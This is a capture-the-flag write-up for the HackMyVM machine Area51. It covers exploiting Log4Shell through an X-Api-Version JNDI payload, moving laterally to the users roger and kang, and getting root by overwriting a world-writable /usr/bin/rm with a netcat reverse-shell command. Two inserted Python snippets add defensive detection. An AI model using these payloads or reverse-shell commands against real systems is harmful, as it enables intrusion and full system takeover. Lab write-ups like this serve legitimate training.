
Area51 – Writeup – Log4Shell – HackMyVM

Area51 is an easy machine built around the recent 0-day vulnerability in the Log4j logging utility. This is one of the vulnerabilities that had a large impact worldwide and affected many enterprises. I would also like to extend a huge thanks to the author bitc0de for this. The machine is fairly simple once we get the foothold. So, let’s start the writeup.

Link to the machine:

Step 1: Get the IP address

As usual, I began enumeration by identifying the IP address of the target machine.

└─$ fping -aqg

Here, the IP address of my Kali machine is and that of the target is . (The IP addresses have reset because I recently switched to Fedora 35 and created a new NAT network on VirtualBox. Please leave a comment if you are a fan of Fedora.)

Step 2: Scan ports using nmap

Next, I checked the open ports on the target that we can access from the network.

└─$ nmap -T4 -sC -sV -p- -oN nmap.log
Starting Nmap 7.92 ( ) at 2022-01-01 19:28 +0545
Nmap scan report for
Host is up (0.00087s latency).
Not shown: 65532 closed tcp ports (conn-refused)
22/tcp   open  ssh         OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   3072 de:bf:2a:93:86:b8:b3:a3:13:5b:46:66:34:d6:dc:b1 (RSA)
|   256 a9:df:bb:71:90:6c:d1:2f:e7:48:97:2e:ad:7b:15:d3 (ECDSA)
|_  256 78:75:83:1c:03:03:a1:92:4f:73:8e:f2:2d:23:d2:0e (ED25519)
80/tcp   open  http        Apache httpd 2.4.51 ((Debian))
|_http-title: FBI Access
|_http-server-header: Apache/2.4.51 (Debian)
8080/tcp open  nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (application/json).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

As we can see above, there are two HTTP ports. The one on 80 is Apache, whereas the one on 8080 is a Spring application. We can identify this from the text “Whitelabel Error Page” that Spring Boot returns for unknown routes.

Step 3: Directory busting using gobuster

The website is pretty static. Thus, I performed directory busting on port 80.

└─$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u -x php,html,txt -o medium.log
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,html,txt
[+] Timeout:                 10s
2022/01/01 19:30:25 Starting gobuster in directory enumeration mode
/video                (Status: 301) [Size: 304] [-->]
/index.html           (Status: 200) [Size: 1131]                            
/radar                (Status: 301) [Size: 304] [-->]
/note.txt             (Status: 200) [Size: 119]                             
/moon                 (Status: 301) [Size: 303] [-->]

We have a note.txt that hints at the Log4j vulnerability.

└─$ curl                                                   
We have a vulnerability in our java application...
Notify the programming department to check Log4J.


Step 4: Check Java Application on port 8080

Firstly, I tested only the “User-Agent” header for the exploit. However, the vulnerable header was actually “X-Api-Version”. I got this information from the website There are other tools that help us test for the exploit, such as

Anyway, I also tested it with my own machine as the callback target. For this, I listened on port 9001.

└─$ nc -nlvp 9001                             
Ncat: Version 7.92 ( )
Ncat: Listening on :::9001
Ncat: Listening on

Then, I sent the payload as follows.

└─$ curl -H 'X-Api-Version: ${jndi:ldap://}'

I got a connection.

└─$ nc -nlvp 9001                             
Ncat: Version 7.92 ( )
Ncat: Listening on :::9001
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from

This means that the application is really vulnerable to the Log4j exploit. For the exploit part, I tried to use JNDI-Exploit-Kit and ysoserial-modified. However, I wasn’t successful. If you were able to get the shell that way, please leave a comment explaining how you did it.
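As an added example (not part of the original writeup), here is a small Python detector that applies the lesson of this step from the defender's side: every request header, not just User-Agent, is checked for a JNDI lookup, after collapsing the nested lookups Log4j itself resolves. The header values and the host attacker.example are constructed samples.

```python
import re
from typing import Dict, List, Tuple

# Log4j resolves ${name:arg} lookups recursively, so a lookup can be assembled from
# inner pieces such as ${lower:j} or the ${:-j} default-value form. Resolve those
# inner pieces first so that the literal "${jndi:" becomes visible to the matcher.
NESTED = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}|\$\{[^${}]*:-([^${}]*)\}", re.I)
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.I)


def normalize(value: str) -> str:
    """Collapse nested Log4j lookups until nothing more resolves (each pass shortens the string)."""
    prev = None
    while prev != value:
        prev = value
        value = NESTED.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), value)
    return value


def scan_headers(headers: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (header name, JNDI scheme) for every header that carries a JNDI lookup."""
    hits = []
    for name, value in headers.items():
        m = JNDI.search(normalize(value))
        if m:
            hits.append((name, m.group(1).lower()))
    return hits


def scan_requests(requests: List[Dict[str, str]]) -> List[Tuple[int, str, str]]:
    """Scan a list of request header sets; returns (request index, header, scheme)."""
    return [(i, h, s) for i, req in enumerate(requests) for h, s in scan_headers(req)]


# Constructed sample traffic; attacker.example stands in for an attacker-controlled host.
SAMPLE_REQUESTS = [
    {"User-Agent": "curl/7.92.0", "X-Api-Version": "1.0"},
    {"User-Agent": "curl/7.92.0", "X-Api-Version": "${jndi:ldap://attacker.example:1389/a}"},
    {"User-Agent": "${${lower:j}ndi:rmi://attacker.example/b}", "X-Api-Version": "2.0"},
]

if __name__ == "__main__":
    for idx, header, scheme in scan_requests(SAMPLE_REQUESTS):
        print(f"request {idx}: JNDI lookup ({scheme}) in header {header}")
```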

Nevertheless, another exploit PoC worked.

└─$ git clone

We have to follow the README carefully. It says that we have to download a particular JDK version; the repo owner has pasted the link in the README file. I copied the JDK into the directory of the exploit.

└─$ python3 --userip

[!] CVE: CVE-2021-44228
[!] Github repo:

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[+] Exploit java class created success
[+] Setting up LDAP server

[+] Send me: ${jndi:ldap://}
[+] Starting Webserver on port 8000

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Listening on

Here, we can see that an LDAP service is open on port 1389.

└─$ curl '' -H 'X-Api-Version: ${jndi:ldap://}'

This gives us a reverse shell inside a Docker container. Furthermore, it is an Alpine image, so we don’t have enough binaries to upgrade to a proper shell.

Step 5: Get the password for the user roger

With the reverse shell, I carefully used to identify a file that has the password.

On my local machine, I used netcat to serve the file.

└─$ nc -nlvp 9001 < ~/
Ncat: Version 7.92 ( )
Ncat: Listening on :::9001
Ncat: Listening on

Then, I used netcat on the target to put the file in the /tmp directory.

nc 9001 > /tmp/
cd /tmp
chmod +x
./ | tee linpeas.out | more

In the output, I saw the file that has the password.

╔══════════╣ All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r--    1 root     root            10 Dec 19 19:19 /var/tmp/.roger

Step 6: Get the password of kang

I logged in to the user roger using SSH.

└─$ ssh roger@
roger@'s password: 
Linux area51 5.10.0-10-amd64 #1 SMP Debian 5.10.84-1 (2021-12-08) x86_64

Last login: Tue Dec 21 08:03:09 2021 from
Your input:
^Croger@area51:~$ ls
shoppingList  SubjectDescription  user.txt
roger@area51:~$ id
uid=1001(roger) gid=1001(roger) groups=1001(roger)

To get rid of the “Your input:” prompt, I simply pressed Ctrl+C. Then, I transferred and pspy64 using a Python web server. I won’t be explaining this step. The also gave me a file that contained the password for the user kang.

╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)

In addition to this information, we can also see that the binary “/usr/bin/rm” is writable by everyone.

This piece of information becomes important once we switch to the user kang.

Step 7: Get the root shell

After I got the shell of kang, I checked the processes using pspy64.

2022/01/01 09:18:17 CMD: UID=0    PID=21123  | sh /kang/ 
2022/01/01 09:18:17 CMD: UID=0    PID=21124  | sleep 1 
2022/01/01 09:18:18 CMD: UID=0    PID=21126  | sleep 2 
2022/01/01 09:18:20 CMD: UID=0    PID=21128  | sleep 1 
2022/01/01 09:18:21 CMD: UID=0    PID=21130  | sleep 2 
2022/01/01 09:18:23 CMD: UID=0    PID=21132  | sleep 1 
2022/01/01 09:18:24 CMD: UID=0    PID=21134  | sleep 2 
2022/01/01 09:18:26 CMD: UID=0    PID=21136  | sleep 1

Here, some “sleep” commands are issued after the “” script in the home directory of kang is run. So, when I checked the home directory, I found that the file is created and removed regularly.

kang@area51:~$ ls -al
total 12
drwxrwx---  3 kang kang 4096 Jan  1 09:19 .
drwxr-xr-x 19 root root 4096 Dec 19 15:49 ..
lrwxrwxrwx  1 root root    9 Dec 19 18:16 .bash_history -> /dev/null
drwxr-xr-x  3 kang kang 4096 Dec 21 07:43 .local

Thus, I had a feeling that we can overwrite the “rm” binary, which is writable by everyone, to get our own shell. For this, I once again spawned a reverse shell on port 9001, so, as you guessed, I was already listening on port 9001.

kang@area51:~$ echo 'nc -e /bin/bash 9001' > /usr/bin/rm

After some time, I got the shell.

└─$ nc -nlvp 9001                
Ncat: Version 7.92 ( )
Ncat: Listening on :::9001
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
uid=0(root) gid=0(root) groups=0(root)
python3 -c 'import pty;pty.spawn("/bin/bash")'
root@area51:/# echo
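As an added example (not part of the original writeup), the following Python audit reproduces the check behind this privilege escalation from the defender's side: it lists world-writable executables in a set of PATH directories and reports which commands a root-run script would invoke by bare name that resolve to one of them. The temporary PATH, the fake rm and the script text are constructed for the demo.

```python
import os
import re
import shutil
import stat
import tempfile
from typing import Dict, List


def world_writable_executables(path_dirs: List[str]) -> Dict[str, str]:
    """Map command name -> file for regular files in path_dirs that anyone can write to."""
    found: Dict[str, str] = {}
    for d in path_dirs:
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            full = os.path.join(d, name)
            try:
                st = os.stat(full)
            except OSError:
                continue
            # First directory in PATH wins, exactly as the shell resolves commands.
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_IWOTH and name not in found:
                found[name] = full
    return found


# First word of each simple command: start of text or after ; | & (covers && and ||).
CMD = re.compile(r"(?:^|[;|&\n])\s*([A-Za-z0-9_./-]+)")


def commands_in_script(text: str) -> List[str]:
    """Bare command names a shell script invokes (a simple tokenizer, not a full parser)."""
    return sorted({c for c in CMD.findall(text) if "/" not in c})


def hijackable_commands(script_text: str, path_dirs: List[str]) -> Dict[str, str]:
    """Commands the script calls by bare name that resolve to a world-writable file."""
    writable = world_writable_executables(path_dirs)
    return {c: writable[c] for c in commands_in_script(script_text) if c in writable}


def demo() -> Dict[str, str]:
    """Constructed scenario: a PATH with a world-writable rm and a root-style cleanup script."""
    tmp = tempfile.mkdtemp()
    bindir = os.path.join(tmp, "bin")
    os.mkdir(bindir)
    for name, mode in (("rm", 0o777), ("sleep", 0o755)):  # rm is the weak one
        with open(os.path.join(bindir, name), "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(os.path.join(bindir, name), mode)
    script = "touch /home/kang/flag\nsleep 1; rm /home/kang/flag\n"
    result = hijackable_commands(script, [bindir])
    shutil.rmtree(tmp)
    return {c: os.path.relpath(p, tmp) for c, p in result.items()}
```

Running the audit against the real PATH of the root cron or script user (for example `hijackable_commands(open(path).read(), os.environ["PATH"].split(":"))`) flags exactly the condition this machine relies on.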

If you want to upgrade the shell, check the following guide.

Upgrade to an intelligent reverse shell

